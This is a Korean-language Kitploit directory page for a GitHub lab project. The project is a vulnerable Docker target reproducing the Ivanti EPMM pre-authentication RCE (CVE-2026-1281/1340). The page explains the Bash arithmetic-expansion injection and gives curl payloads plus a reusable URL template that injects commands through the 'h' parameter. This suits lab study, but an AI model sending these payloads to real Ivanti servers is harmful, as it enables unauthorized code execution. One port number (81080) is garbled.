Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다. | Kitploit
도구/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다.

저장소 보기
36개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ivanti EPMM 사전 인증 RCE 더미 타깃

Ivanti EPMM 사전 인증 RCE 취약점(CVE-2026-1281 / CVE-2026-1340)을 교육 및 보안 연구 목적으로 재현하는 방법을 보여주는 간단한 데모 애플리케이션입니다.

취약점 개요

이 취약점은 Bash 산술 확장(arithmetic expansion) 동작을 악용합니다. 다른 변수에 대한 참조를 포함하는 변수가 산술 컨텍스트에서 사용되고, 해당 참조 변수가 명령 치환(command substitution)이 포함된 배열 인덱스를 포함할 때 명령이 실행됩니다.

악용 체인

  1. 요청에 st=theValue (패딩이 포함된 리터럴 문자열 "theValue")가 포함됨
  2. 요청에 h=gPath[\command`]`(배열 인덱스의 명령)가 포함됨
  3. Bash 스크립트가 루프에서 key=value 쌍을 파싱하여 각 반복마다 theValue를 업데이트함
  4. gStartTime이 리터럴 문자열 "theValue"로 설정됨
  5. 루프 후 theValue에 gPath[\command`]`가 포함됨
  • [[ ${currentTime} -gt ${gStartTime} ]]가 평가될 때:
    • ${gStartTime} → "theValue"(문자열)
    • 산술 컨텍스트가 theValue를 변수 참조로 처리함
    • theValue → gPath[\command`]`
    • 배열 인덱스가 명령 치환을 트리거함 → RCE!
  • 빠른 시작

    root@kitploit:~
    # 컨테이너 빌드 및 시작
    docker-compose up --build -d
    
    # 실행 확인
    curl http://localhost:8180/health
    

    취약점 테스트

    1. 파일 생성 테스트

    명령 실행을 증명할 파일 생성:

    root@kitploit:~
    # URL 인코딩된 페이로드: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # 파일이 생성되었는지 확인
    cat artifacts/poc
    

    2. 시간 기반 테스트

    sleep 명령으로 검증:

    root@kitploit:~
    # 응답에 약 5초가 걸려야 함
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. 사용자 정의 명령 실행

    root@kitploit:~
    # 사용자 정의 콘텐츠 작성
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    URL 구조

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ 페이로드: gPath[`COMMAND`]
                                   │      │              └─ 종료 타임스탬프(10자리 숫자)
                                   │      └─ 중요: 리터럴 "theValue" + 공백 2개(총 10자)
                                   └─ 키 인덱스(임의 값)
    

    디버깅

    root@kitploit:~
    # 컨테이너 로그 보기
    docker-compose logs -f
    
    # 컨테이너에서 셸 실행
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # nginx 오류 로그 확인
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    정리

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    참고 자료

    • WatchTowr Labs 블로그 게시물

    면책 조항

    이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에는 사용하지 마십시오.

    도구 다운로드